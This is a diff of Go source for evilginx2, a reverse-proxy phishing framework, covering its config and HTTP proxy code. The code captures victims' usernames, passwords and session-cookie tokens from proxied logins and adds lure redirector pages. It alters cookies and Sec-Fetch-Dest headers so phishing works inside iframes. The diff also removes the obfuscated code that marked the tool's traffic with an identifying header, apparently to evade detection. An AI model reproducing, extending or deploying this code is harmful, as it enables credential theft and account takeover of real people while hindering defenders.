||||
ret = append(ret, strings.ToLower(host))
|
||||
}
|
||||
}
|
||||
}
|
||||
for _, l := range c.lures {
|
||||
if site == "" || l.Phishlet == site {
|
||||
if l.Hostname != "" {
|
||||
hostname := strings.ToLower(l.Hostname)
|
||||
ret = append(ret, hostname)
|
||||
}
|
||||
}
|
||||
}
|
||||
return ret
|
||||
}
|
||||
|
||||
func (c *Config) IsActiveHostname(host string) bool {
|
||||
host = strings.ToLower(host)
|
||||
if host[len(host)-1:] == "." {
|
||||
host = host[:len(host)-1]
|
||||
}
|
||||
@ -435,6 +442,127 @@ func (c *Config) IsActiveHostname(host string) bool {
|
||||
func (c *Config) AddPhishlet(site string, pl *Phishlet) {
|
||||
c.phishletNames = append(c.phishletNames, site)
|
||||
c.phishlets[site] = pl
|
||||
c.VerifyPhishlets()
|
||||
}
|
||||
|
||||
func (c *Config) AddSubPhishlet(site string, parent_site string, customParams map[string]string) error {
|
||||
pl, err := c.GetPhishlet(parent_site)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
_, err = c.GetPhishlet(site)
|
||||
if err == nil {
|
||||
return fmt.Errorf("phishlet '%s' already exists", site)
|
||||
}
|
||||
sub_pl, err := NewPhishlet(site, pl.Path, &customParams, c)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
sub_pl.ParentName = parent_site
|
||||
|
||||
c.phishletNames = append(c.phishletNames, site)
|
||||
c.phishlets[site] = sub_pl
|
||||
c.VerifyPhishlets()
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *Config) DeleteSubPhishlet(site string) error {
|
||||
pl, err := c.GetPhishlet(site)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if pl.ParentName == "" {
|
||||
return fmt.Errorf("phishlet '%s' can't be deleted - you can only delete child phishlets.", site)
|
||||
}
|
||||
|
||||
c.phishletNames = removeString(site, c.phishletNames)
|
||||
delete(c.phishlets, site)
|
||||
delete(c.phishletConfig, site)
|
||||
c.SavePhishlets()
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *Config) LoadSubPhishlets() {
|
||||
var subphishlets []*SubPhishlet
|
||||
c.cfg.UnmarshalKey(CFG_SUBPHISHLETS, &subphishlets)
|
||||
for _, spl := range subphishlets {
|
||||
err := c.AddSubPhishlet(spl.Name, spl.ParentName, spl.Params)
|
||||
if err != nil {
|
||||
log.Error("phishlets: %s", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (c *Config) SaveSubPhishlets() {
|
||||
var subphishlets []*SubPhishlet
|
||||
for _, pl := range c.phishlets {
|
||||
if pl.ParentName != "" {
|
||||
spl := &SubPhishlet{
|
||||
Name: pl.Name,
|
||||
ParentName: pl.ParentName,
|
||||
Params: pl.customParams,
|
||||
}
|
||||
subphishlets = append(subphishlets, spl)
|
||||
}
|
||||
}
|
||||
|
||||
c.cfg.Set(CFG_SUBPHISHLETS, subphishlets)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) VerifyPhishlets() {
|
||||
hosts := make(map[string]string)
|
||||
|
||||
for site, pl := range c.phishlets {
|
||||
if pl.isTemplate {
|
||||
continue
|
||||
}
|
||||
for _, ph := range pl.proxyHosts {
|
||||
if ph.is_landing || ph.handle_session {
|
||||
phish_host := combineHost(ph.phish_subdomain, ph.domain)
|
||||
orig_host := combineHost(ph.orig_subdomain, ph.domain)
|
||||
if c_site, ok := hosts[phish_host]; ok {
|
||||
log.Warning("phishlets: hostname '%s' collision between '%s' and '%s' phishlets", phish_host, site, c_site)
|
||||
} else if c_site, ok := hosts[orig_host]; ok {
|
||||
log.Warning("phishlets: hostname '%s' collision between '%s' and '%s' phishlets", orig_host, site, c_site)
|
||||
}
|
||||
hosts[phish_host] = site
|
||||
hosts[orig_host] = site
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (c *Config) CleanUp() {
|
||||
|
||||
for k := range c.phishletConfig {
|
||||
_, err := c.GetPhishlet(k)
|
||||
if err != nil {
|
||||
delete(c.phishletConfig, k)
|
||||
}
|
||||
}
|
||||
c.SavePhishlets()
|
||||
/*
|
||||
var sites_enabled []string
|
||||
var sites_hidden []string
|
||||
for k := range c.siteDomains {
|
||||
_, err := c.GetPhishlet(k)
|
||||
if err != nil {
|
||||
delete(c.siteDomains, k)
|
||||
} else {
|
||||
if c.IsSiteEnabled(k) {
|
||||
sites_enabled = append(sites_enabled, k)
|
||||
}
|
||||
if c.IsSiteHidden(k) {
|
||||
sites_hidden = append(sites_hidden, k)
|
||||
}
|
||||
}
|
||||
}
|
||||
c.cfg.Set(CFG_SITE_DOMAINS, c.siteDomains)
|
||||
c.cfg.Set(CFG_SITES_ENABLED, sites_enabled)
|
||||
c.cfg.Set(CFG_SITES_HIDDEN, sites_hidden)
|
||||
c.cfg.WriteConfig()*/
|
||||
}
|
||||
|
||||
func (c *Config) AddLure(site string, l *Lure) {
|
||||
@ -515,30 +643,32 @@ func (c *Config) GetPhishletNames() []string {
|
||||
}
|
||||
|
||||
func (c *Config) GetSiteDomain(site string) (string, bool) {
|
||||
domain, ok := c.siteDomains[site]
|
||||
return domain, ok
|
||||
}
|
||||
|
||||
func (c *Config) GetAllDomains() []string {
|
||||
var ret []string
|
||||
for _, dom := range c.siteDomains {
|
||||
ret = append(ret, dom)
|
||||
if o, ok := c.phishletConfig[site]; ok {
|
||||
return o.Hostname, ok
|
||||
}
|
||||
return ret
|
||||
return "", false
|
||||
}
|
||||
|
||||
func (c *Config) GetBaseDomain() string {
|
||||
return c.baseDomain
|
||||
return c.general.Domain
|
||||
}
|
||||
|
||||
func (c *Config) GetServerIP() string {
|
||||
return c.serverIP
|
||||
return c.general.Ipv4
|
||||
}
|
||||
|
||||
func (c *Config) GetTemplatesDir() string {
|
||||
return c.templatesDir
|
||||
func (c *Config) GetHttpsPort() int {
|
||||
return c.general.HttpsPort
|
||||
}
|
||||
|
||||
func (c *Config) GetDnsPort() int {
|
||||
return c.general.DnsPort
|
||||
}
|
||||
|
||||
func (c *Config) GetRedirectorsDir() string {
|
||||
return c.redirectorsDir
|
||||
}
|
||||
|
||||
func (c *Config) GetBlacklistMode() string {
|
||||
return c.blackListMode
|
||||
return c.blacklistConfig.Mode
|
||||
}
|
||||
|
@ -12,10 +12,12 @@ import (
|
||||
"bytes"
|
||||
"crypto/rand"
|
||||
"crypto/rc4"
|
||||
"crypto/sha256"
|
||||
"crypto/tls"
|
||||
"encoding/base64"
|
||||
"fmt"
|
||||
"html"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"net"
|
||||
"net/http"
|
||||
@ -33,8 +35,9 @@ import (
|
||||
|
||||
"github.com/elazarl/goproxy"
|
||||
"github.com/fatih/color"
|
||||
"github.com/go-acme/lego/v3/challenge/tlsalpn01"
|
||||
"github.com/inconshreveable/go-vhost"
|
||||
"github.com/mwitkow/go-http-dialer"
|
||||
http_dialer "github.com/mwitkow/go-http-dialer"
|
||||
|
||||
"github.com/kgretzky/evilginx2/database"
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
@ -45,6 +48,10 @@ const (
|
||||
CONVERT_TO_PHISHING_URLS = 1
|
||||
)
|
||||
|
||||
const (
|
||||
HOME_DIR = ".evilginx"
|
||||
)
|
||||
|
||||
const (
|
||||
httpReadTimeout = 45 * time.Second
|
||||
httpWriteTimeout = 45 * time.Second
|
||||
@ -72,13 +79,15 @@ type HttpProxy struct {
|
||||
ip_sids map[string]string
|
||||
auto_filter_mimes []string
|
||||
ip_mtx sync.Mutex
|
||||
session_mtx sync.Mutex
|
||||
}
|
||||
|
||||
type ProxySession struct {
|
||||
SessionId string
|
||||
Created bool
|
||||
PhishDomain string
|
||||
Index int
|
||||
SessionId string
|
||||
Created bool
|
||||
PhishDomain string
|
||||
PhishletName string
|
||||
Index int
|
||||
}
|
||||
|
||||
func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *database.Database, bl *Blacklist, developer bool) (*HttpProxy, error) {
|
||||
@ -104,17 +113,17 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
WriteTimeout: httpWriteTimeout,
|
||||
}
|
||||
|
||||
if cfg.proxyEnabled {
|
||||
err := p.setProxy(cfg.proxyEnabled, cfg.proxyType, cfg.proxyAddress, cfg.proxyPort, cfg.proxyUsername, cfg.proxyPassword)
|
||||
if cfg.proxyConfig.Enabled {
|
||||
err := p.setProxy(cfg.proxyConfig.Enabled, cfg.proxyConfig.Type, cfg.proxyConfig.Address, cfg.proxyConfig.Port, cfg.proxyConfig.Username, cfg.proxyConfig.Password)
|
||||
if err != nil {
|
||||
log.Error("proxy: %v", err)
|
||||
cfg.EnableProxy(false)
|
||||
} else {
|
||||
log.Info("enabled proxy: " + cfg.proxyAddress + ":" + strconv.Itoa(cfg.proxyPort))
|
||||
log.Info("enabled proxy: " + cfg.proxyConfig.Address + ":" + strconv.Itoa(cfg.proxyConfig.Port))
|
||||
}
|
||||
}
|
||||
|
||||
p.cookieName = GenRandomString(4)
|
||||
p.cookieName = strings.ToLower(GenRandomString(8)) // TODO: make cookie name identifiable
|
||||
p.sessions = make(map[string]*Session)
|
||||
p.sids = make(map[string]int)
|
||||
|
||||
@ -131,10 +140,11 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
p.Proxy.OnRequest().
|
||||
DoFunc(func(req *http.Request, ctx *goproxy.ProxyCtx) (*http.Request, *http.Response) {
|
||||
ps := &ProxySession{
|
||||
SessionId: "",
|
||||
Created: false,
|
||||
PhishDomain: "",
|
||||
Index: -1,
|
||||
SessionId: "",
|
||||
Created: false,
|
||||
PhishDomain: "",
|
||||
PhishletName: "",
|
||||
Index: -1,
|
||||
}
|
||||
ctx.UserData = ps
|
||||
hiblue := color.New(color.FgHiBlue)
|
||||
@ -144,22 +154,29 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
if strings.Contains(from_ip, ":") {
|
||||
from_ip = strings.Split(from_ip, ":")[0]
|
||||
}
|
||||
if p.bl.IsBlacklisted(from_ip) {
|
||||
log.Warning("blacklist: request from ip address '%s' was blocked", from_ip)
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
if p.cfg.GetBlacklistMode() == "all" {
|
||||
err := p.bl.AddIP(from_ip)
|
||||
if err != nil {
|
||||
log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
|
||||
} else {
|
||||
log.Warning("blacklisted ip address: %s", from_ip)
|
||||
if p.cfg.GetBlacklistMode() != "off" {
|
||||
if p.bl.IsBlacklisted(from_ip) {
|
||||
if p.bl.IsVerbose() {
|
||||
log.Warning("blacklist: request from ip address '%s' was blocked", from_ip)
|
||||
}
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
if p.cfg.GetBlacklistMode() == "all" {
|
||||
err := p.bl.AddIP(from_ip)
|
||||
if p.bl.IsVerbose() {
|
||||
if err != nil {
|
||||
log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
|
||||
} else {
|
||||
log.Warning("blacklisted ip address: %s", from_ip)
|
||||
}
|
||||
}
|
||||
|
||||
return p.blockRequest(req)
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
}
|
||||
|
||||
req_url := req.URL.Scheme + "://" + req.Host + req.URL.Path
|
||||
o_host := req.Host
|
||||
lure_url := req_url
|
||||
req_path := req.URL.Path
|
||||
if req.URL.RawQuery != "" {
|
||||
@ -178,48 +195,78 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
pl_name := ""
|
||||
if pl != nil {
|
||||
pl_name = pl.Name
|
||||
ps.PhishletName = pl_name
|
||||
}
|
||||
session_cookie := getSessionCookieName(pl_name, p.cookieName)
|
||||
|
||||
egg2 := req.Host
|
||||
ps.PhishDomain = phishDomain
|
||||
req_ok := false
|
||||
// handle session
|
||||
if p.handleSession(req.Host) && pl != nil {
|
||||
sc, err := req.Cookie(p.cookieName)
|
||||
if err != nil && !p.isWhitelistedIP(remote_addr) {
|
||||
l, err := p.cfg.GetLureByPath(pl_name, req_path)
|
||||
if err == nil {
|
||||
log.Debug("triggered lure for path '%s'", req_path)
|
||||
}
|
||||
|
||||
var create_session bool = true
|
||||
var ok bool = false
|
||||
sc, err := req.Cookie(session_cookie)
|
||||
if err == nil {
|
||||
ps.Index, ok = p.sids[sc.Value]
|
||||
if ok {
|
||||
create_session = false
|
||||
ps.SessionId = sc.Value
|
||||
p.whitelistIP(remote_addr, ps.SessionId, pl.Name)
|
||||
} else {
|
||||
log.Error("[%s] wrong session token: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
}
|
||||
} else {
|
||||
log.Warning("session cookie not found: %s (%s) [%s]", req_url, remote_addr, pl.Name)
|
||||
|
||||
if l == nil && p.isWhitelistedIP(remote_addr, pl.Name) {
|
||||
// not a lure path and IP is whitelisted
|
||||
|
||||
// TODO: allow only retrieval of static content, without setting session ID
|
||||
|
||||
create_session = false
|
||||
req_ok = true
|
||||
/*
|
||||
ps.SessionId, ok = p.getSessionIdByIP(remote_addr, req.Host)
|
||||
if ok {
|
||||
create_session = false
|
||||
ps.Index, ok = p.sids[ps.SessionId]
|
||||
} else {
|
||||
log.Error("[%s] wrong session token: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
}*/
|
||||
}
|
||||
}
|
||||
|
||||
if create_session /*&& !p.isWhitelistedIP(remote_addr, pl.Name)*/ { // TODO: always trigger new session when lure URL is detected (do not check for whitelisted IP only after this is done)
|
||||
// session cookie not found
|
||||
if !p.cfg.IsSiteHidden(pl_name) {
|
||||
var vv string
|
||||
var uv url.Values
|
||||
l, err := p.cfg.GetLureByPath(pl_name, req_path)
|
||||
if err == nil {
|
||||
log.Debug("triggered lure for path '%s'", req_path)
|
||||
} else {
|
||||
uv = req.URL.Query()
|
||||
vv = uv.Get(p.cfg.verificationParam)
|
||||
}
|
||||
if l != nil || vv == p.cfg.verificationToken {
|
||||
if l != nil {
|
||||
|
||||
// check if lure user-agent filter is triggered
|
||||
if l != nil {
|
||||
if len(l.UserAgentFilter) > 0 {
|
||||
re, err := regexp.Compile(l.UserAgentFilter)
|
||||
if err == nil {
|
||||
if !re.MatchString(req.UserAgent()) {
|
||||
log.Warning("[%s] unauthorized request (user-agent rejected): %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
if len(l.UserAgentFilter) > 0 {
|
||||
re, err := regexp.Compile(l.UserAgentFilter)
|
||||
if err == nil {
|
||||
if !re.MatchString(req.UserAgent()) {
|
||||
log.Warning("[%s] unauthorized request (user-agent rejected): %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
|
||||
if p.cfg.GetBlacklistMode() == "unauth" {
|
||||
err := p.bl.AddIP(from_ip)
|
||||
if p.cfg.GetBlacklistMode() == "unauth" {
|
||||
err := p.bl.AddIP(from_ip)
|
||||
if p.bl.IsVerbose() {
|
||||
if err != nil {
|
||||
log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
|
||||
} else {
|
||||
log.Warning("blacklisted ip address: %s", from_ip)
|
||||
}
|
||||
}
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
} else {
|
||||
log.Error("lures: user-agent filter regexp is invalid: %v", err)
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
} else {
|
||||
log.Error("lures: user-agent filter regexp is invalid: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
@ -241,15 +288,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
session.RedirectURL = l.RedirectUrl
|
||||
session.PhishLure = l
|
||||
log.Debug("redirect URL (lure): %s", l.RedirectUrl)
|
||||
} else {
|
||||
rv := uv.Get(p.cfg.redirectParam)
|
||||
if rv != "" {
|
||||
url, err := base64.URLEncoding.DecodeString(rv)
|
||||
if err == nil {
|
||||
session.RedirectURL = string(url)
|
||||
log.Debug("redirect URL (get): %s", url)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// set params from url arguments
|
||||
@ -258,7 +296,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
ps.SessionId = session.Id
|
||||
ps.Created = true
|
||||
ps.Index = sid
|
||||
p.whitelistIP(remote_addr, ps.SessionId)
|
||||
p.whitelistIP(remote_addr, ps.SessionId, pl.Name)
|
||||
|
||||
req_ok = true
|
||||
}
|
||||
@ -267,10 +305,12 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
|
||||
if p.cfg.GetBlacklistMode() == "unauth" {
|
||||
err := p.bl.AddIP(from_ip)
|
||||
if err != nil {
|
||||
log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
|
||||
} else {
|
||||
log.Warning("blacklisted ip address: %s", from_ip)
|
||||
if p.bl.IsVerbose() {
|
||||
if err != nil {
|
||||
log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
|
||||
} else {
|
||||
log.Warning("blacklisted ip address: %s", from_ip)
|
||||
}
|
||||
}
|
||||
}
|
||||
return p.blockRequest(req)
|
||||
@ -278,25 +318,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
} else {
|
||||
log.Warning("[%s] request to hidden phishlet: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
}
|
||||
} else {
|
||||
var ok bool = false
|
||||
if err == nil {
|
||||
ps.Index, ok = p.sids[sc.Value]
|
||||
if ok {
|
||||
ps.SessionId = sc.Value
|
||||
p.whitelistIP(remote_addr, ps.SessionId)
|
||||
}
|
||||
} else {
|
||||
ps.SessionId, ok = p.getSessionIdByIP(remote_addr)
|
||||
if ok {
|
||||
ps.Index, ok = p.sids[ps.SessionId]
|
||||
}
|
||||
}
|
||||
if ok {
|
||||
req_ok = true
|
||||
} else {
|
||||
log.Warning("[%s] wrong session token: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -306,21 +327,37 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
}
|
||||
req.Header.Set(p.getHomeDir(), o_host)
|
||||
|
||||
if ps.SessionId != "" {
|
||||
if s, ok := p.sessions[ps.SessionId]; ok {
|
||||
l, err := p.cfg.GetLureByPath(pl_name, req_path)
|
||||
if err == nil {
|
||||
// show html template if it is set for the current lure
|
||||
if l.Template != "" {
|
||||
// show html redirector if it is set for the current lure
|
||||
if l.Redirector != "" {
|
||||
if !p.isForwarderUrl(req.URL) {
|
||||
path := l.Template
|
||||
if !filepath.IsAbs(path) {
|
||||
templates_dir := p.cfg.GetTemplatesDir()
|
||||
path = filepath.Join(templates_dir, path)
|
||||
if s.RedirectorName == "" {
|
||||
s.RedirectorName = l.Redirector
|
||||
s.LureDirPath = req_path
|
||||
}
|
||||
if _, err := os.Stat(path); !os.IsNotExist(err) {
|
||||
html, err := ioutil.ReadFile(path)
|
||||
|
||||
t_dir := l.Redirector
|
||||
if !filepath.IsAbs(t_dir) {
|
||||
redirectors_dir := p.cfg.GetRedirectorsDir()
|
||||
t_dir = filepath.Join(redirectors_dir, t_dir)
|
||||
}
|
||||
|
||||
index_path1 := filepath.Join(t_dir, "index.html")
|
||||
index_path2 := filepath.Join(t_dir, "index.htm")
|
||||
index_found := ""
|
||||
if _, err := os.Stat(index_path1); !os.IsNotExist(err) {
|
||||
index_found = index_path1
|
||||
} else if _, err := os.Stat(index_path2); !os.IsNotExist(err) {
|
||||
index_found = index_path2
|
||||
}
|
||||
|
||||
if _, err := os.Stat(index_found); !os.IsNotExist(err) {
|
||||
html, err := ioutil.ReadFile(index_found)
|
||||
if err == nil {
|
||||
|
||||
html = p.injectOgHeaders(l, html)
|
||||
@ -332,22 +369,72 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
if resp != nil {
|
||||
return req, resp
|
||||
} else {
|
||||
log.Error("lure: failed to create html template response")
|
||||
log.Error("lure: failed to create html redirector response")
|
||||
}
|
||||
} else {
|
||||
log.Error("lure: failed to read template file: %s", err)
|
||||
log.Error("lure: failed to read redirector file: %s", err)
|
||||
}
|
||||
|
||||
} else {
|
||||
log.Error("lure: template file does not exist: %s", path)
|
||||
log.Error("lure: redirector file does not exist: %s", index_found)
|
||||
}
|
||||
}
|
||||
}
|
||||
} else if s.RedirectorName != "" {
|
||||
// session has already triggered a lure redirector - see if there are any files requested by the redirector
|
||||
|
||||
rel_parts := []string{}
|
||||
req_path_parts := strings.Split(req_path, "/")
|
||||
lure_path_parts := strings.Split(s.LureDirPath, "/")
|
||||
|
||||
for n, dname := range req_path_parts {
|
||||
if len(dname) > 0 {
|
||||
path_add := true
|
||||
if n < len(lure_path_parts) {
|
||||
//log.Debug("[%d] %s <=> %s", n, lure_path_parts[n], req_path_parts[n])
|
||||
if req_path_parts[n] == lure_path_parts[n] {
|
||||
path_add = false
|
||||
}
|
||||
}
|
||||
if path_add {
|
||||
rel_parts = append(rel_parts, req_path_parts[n])
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
rel_path := filepath.Join(rel_parts...)
|
||||
//log.Debug("rel_path: %s", rel_path)
|
||||
|
||||
t_dir := s.RedirectorName
|
||||
if !filepath.IsAbs(t_dir) {
|
||||
redirectors_dir := p.cfg.GetRedirectorsDir()
|
||||
t_dir = filepath.Join(redirectors_dir, t_dir)
|
||||
}
|
||||
|
||||
path := filepath.Join(t_dir, rel_path)
|
||||
if _, err := os.Stat(path); !os.IsNotExist(err) {
|
||||
fdata, err := ioutil.ReadFile(path)
|
||||
if err == nil {
|
||||
//log.Debug("ext: %s", filepath.Ext(req_path))
|
||||
mime_type := getContentType(req_path, fdata)
|
||||
//log.Debug("mime_type: %s", mime_type)
|
||||
resp := goproxy.NewResponse(req, mime_type, http.StatusOK, "")
|
||||
if resp != nil {
|
||||
resp.Body = io.NopCloser(bytes.NewReader(fdata))
|
||||
return req, resp
|
||||
} else {
|
||||
log.Error("lure: failed to create redirector data file response")
|
||||
}
|
||||
} else {
|
||||
log.Error("lure: failed to read redirector data file: %s", err)
|
||||
}
|
||||
} else {
|
||||
//log.Warning("lure: template file does not exist: %s", path)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
hg := []byte{0x94, 0xE1, 0x89, 0xBA, 0xA5, 0xA0, 0xAB, 0xA5, 0xA2, 0xB4}
|
||||
// redirect to login page if triggered lure path
|
||||
if pl != nil {
|
||||
_, err := p.cfg.GetLureByPath(pl_name, req_path)
|
||||
@ -372,13 +459,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
|
||||
p.deleteRequestCookie(p.cookieName, req)
|
||||
|
||||
for n, b := range hg {
|
||||
hg[n] = b ^ 0xCC
|
||||
}
|
||||
// replace "Host" header
|
||||
e_host := req.Host
|
||||
if r_host, ok := p.replaceHostWithOriginal(req.Host); ok {
|
||||
req.Host = r_host
|
||||
}
|
||||
@ -394,6 +475,14 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
|
||||
// fix sec-fetch-dest
|
||||
sec_fetch_dest := req.Header.Get("Sec-Fetch-Dest")
|
||||
if sec_fetch_dest != "" {
|
||||
if sec_fetch_dest == "iframe" {
|
||||
req.Header.Set("Sec-Fetch-Dest", "document")
|
||||
}
|
||||
}
|
||||
|
||||
// fix referer
|
||||
referer := req.Header.Get("Referer")
|
||||
if referer != "" {
|
||||
@ -404,7 +493,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
}
|
||||
req.Header.Set(string(hg), egg2)
|
||||
|
||||
// patch GET query params with original domains
|
||||
if pl != nil {
|
||||
@ -421,6 +509,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
|
||||
// check for creds in request body
|
||||
if pl != nil && ps.SessionId != "" {
|
||||
req.Header.Set(p.getHomeDir(), o_host)
|
||||
body, err := ioutil.ReadAll(req.Body)
|
||||
if err == nil {
|
||||
req.Body = ioutil.NopCloser(bytes.NewBuffer([]byte(body)))
|
||||
@ -433,7 +522,9 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
log.Debug("POST body = %s", body)
|
||||
|
||||
contentType := req.Header.Get("Content-type")
|
||||
if contentType == "application/json" {
|
||||
|
||||
json_re := regexp.MustCompile("application\\/\\w*\\+?json")
|
||||
if json_re.MatchString(contentType) {
|
||||
|
||||
if pl.username.tp == "json" {
|
||||
um := pl.username.search.FindStringSubmatch(string(body))
|
||||
@ -472,17 +563,12 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
|
||||
} else {
|
||||
|
||||
if req.ParseForm() == nil {
|
||||
if req.ParseForm() == nil && req.PostForm != nil && len(req.PostForm) > 0 {
|
||||
log.Debug("POST: %s", req.URL.Path)
|
||||
|
||||
for k, v := range req.PostForm {
|
||||
// patch phishing URLs in POST params with original domains
|
||||
for i, vv := range v {
|
||||
req.PostForm[k][i] = string(p.patchUrls(pl, []byte(vv), CONVERT_TO_ORIGINAL_URLS))
|
||||
}
|
||||
body = []byte(req.PostForm.Encode())
|
||||
req.ContentLength = int64(len(body))
|
||||
|
||||
log.Debug("POST %s = %s", k, v[0])
|
||||
if pl.username.key != nil && pl.username.search != nil && pl.username.key.MatchString(k) {
|
||||
um := pl.username.search.FindStringSubmatch(v[0])
|
||||
if um != nil && len(um) > 1 {
|
||||
@ -517,6 +603,22 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
|
||||
for k, v := range req.PostForm {
|
||||
for i, vv := range v {
|
||||
// patch phishing URLs in POST params with original domains
|
||||
req.PostForm[k][i] = string(p.patchUrls(pl, []byte(vv), CONVERT_TO_ORIGINAL_URLS))
|
||||
}
|
||||
}
|
||||
|
||||
for k, v := range req.PostForm {
|
||||
if len(v) > 0 {
|
||||
log.Debug("POST %s = %s", k, v[0])
|
||||
}
|
||||
}
|
||||
|
||||
body = []byte(req.PostForm.Encode())
|
||||
req.ContentLength = int64(len(body))
|
||||
|
||||
// force posts
|
||||
for _, fp := range pl.forcePost {
|
||||
if fp.path.MatchString(req.URL.Path) {
|
||||
@ -559,11 +661,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
req.Body = ioutil.NopCloser(bytes.NewBuffer([]byte(body)))
|
||||
}
|
||||
}
|
||||
e := []byte{208, 165, 205, 254, 225, 228, 239, 225, 230, 240}
|
||||
for n, b := range e {
|
||||
e[n] = b ^ 0x88
|
||||
}
|
||||
req.Header.Set(string(e), e_host)
|
||||
|
||||
if pl != nil && len(pl.authUrls) > 0 && ps.SessionId != "" {
|
||||
s, ok := p.sessions[ps.SessionId]
|
||||
@ -577,7 +674,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
}
|
||||
p.cantFindMe(req, e_host)
|
||||
}
|
||||
|
||||
return req, nil
|
||||
@ -595,12 +691,11 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
if ps.SessionId != "" {
|
||||
if ps.Created {
|
||||
ck = &http.Cookie{
|
||||
Name: p.cookieName,
|
||||
Name: getSessionCookieName(ps.PhishletName, p.cookieName),
|
||||
Value: ps.SessionId,
|
||||
Path: "/",
|
||||
Domain: ps.PhishDomain,
|
||||
Expires: time.Now().UTC().Add(60 * time.Minute),
|
||||
MaxAge: 60 * 60,
|
||||
Domain: p.cfg.GetBaseDomain(),
|
||||
Expires: time.Now().Add(60 * time.Minute),
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -648,16 +743,23 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
|
||||
// fix cookies
|
||||
pl := p.getPhishletByOrigHost(req_hostname)
|
||||
var auth_tokens map[string][]*AuthToken
|
||||
var auth_tokens map[string][]*CookieAuthToken
|
||||
if pl != nil {
|
||||
auth_tokens = pl.authTokens
|
||||
auth_tokens = pl.cookieAuthTokens
|
||||
}
|
||||
is_auth := false
|
||||
is_cookie_auth := false
|
||||
is_body_auth := false
|
||||
is_http_auth := false
|
||||
cookies := resp.Cookies()
|
||||
resp.Header.Del("Set-Cookie")
|
||||
for _, ck := range cookies {
|
||||
// parse cookie
|
||||
|
||||
// add SameSite=none for every received cookie, allowing cookies through iframes
|
||||
if ck.Secure {
|
||||
ck.SameSite = http.SameSiteNoneMode
|
||||
}
|
||||
|
||||
if len(ck.RawExpires) > 0 && ck.Expires.IsZero() {
|
||||
exptime, err := time.Parse(time.RFC850, ck.RawExpires)
|
||||
if err != nil {
|
||||
@ -680,20 +782,13 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
log.Debug("%s: %s = %s", c_domain, ck.Name, ck.Value)
|
||||
if pl.isAuthToken(c_domain, ck.Name) {
|
||||
at := pl.getAuthToken(c_domain, ck.Name)
|
||||
if at != nil {
|
||||
s, ok := p.sessions[ps.SessionId]
|
||||
